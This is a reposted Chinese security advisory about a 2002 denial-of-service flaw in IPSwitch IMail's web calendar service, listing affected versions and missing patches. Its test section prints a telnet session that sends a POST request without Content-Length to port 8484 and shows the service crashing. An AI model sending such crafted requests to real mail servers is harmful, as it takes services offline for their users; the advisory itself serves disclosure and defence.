IPSwitch IMail Web日志服务HTTP POST远程拒绝服…

2008-04-09 04:28:32来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

IPSwitch IMail Web日志服务HTTP POST远程拒绝服务攻击漏洞

发布日期:2002-07-30
更新日期:2002-08-01

受影响系统:
Ipswitch IMail 7.1
Ipswitch IMail 7.0.7
Ipswitch IMail 7.0.6
Ipswitch IMail 7.0.5
Ipswitch IMail 7.0.4
Ipswitch IMail 7.0.3
Ipswitch IMail 7.0.2
Ipswitch IMail 7.0.1
Ipswitch IMail 6.4
Ipswitch IMail 6.3
Ipswitch IMail 6.2
Ipswitch IMail 6.1
Ipswitch IMail 6.0.6
Ipswitch IMail 6.0.5
Ipswitch IMail 6.0.4
Ipswitch IMail 6.0.3
Ipswitch IMail 6.0.2
Ipswitch IMail 6.0.1
Ipswitch IMail 6.0
Ipswitch IMail 5.0.8
Ipswitch IMail 5.0.7
Ipswitch IMail 5.0.6
Ipswitch IMail 5.0.5
Ipswitch IMail 5.0
描述:
IMail是一款由Ipswitch公司开发和维护的商业电子邮件服务程序,IMail可使用在Microsoft Windows操作系统下,其中包含基于WEB的日历服务。

IMail的WEB的日历服务在处理HTTP POST请求时缺少正确的处理,远程攻击者可以利用这个漏洞进行拒绝服务攻击。

IMail的WEB的日历服务监听TCP 8484端口,攻击者可以提交不包含"Content-Length"长度的HTTP POST请求给IMail的WEB的日历服务,可导致iwebcal服务崩溃,产生拒绝服务攻击。

<*来源:2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com (2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com)

链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0399.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com 提供了如下测试方法:

xxx@xx:~$ telnet 192.168.0.2 8484
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
POST / HTTP/1.0


Connection closed by foreign host.


[the iwebcal service has crashed]


xxx@xx:~$ telnet 192.168.0.2 8484
Trying 192.168.0.2...
telnet: connect to address 192.168.0.2: Connection refused

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时没有合适的临时解决方法。

厂商补丁:

Ipswitch
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ipswitch.com/

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Brother NC-3100H远程拒绝服务攻击漏洞

下一篇:Rod Clark sendform.cgi远程可获得任意文件漏洞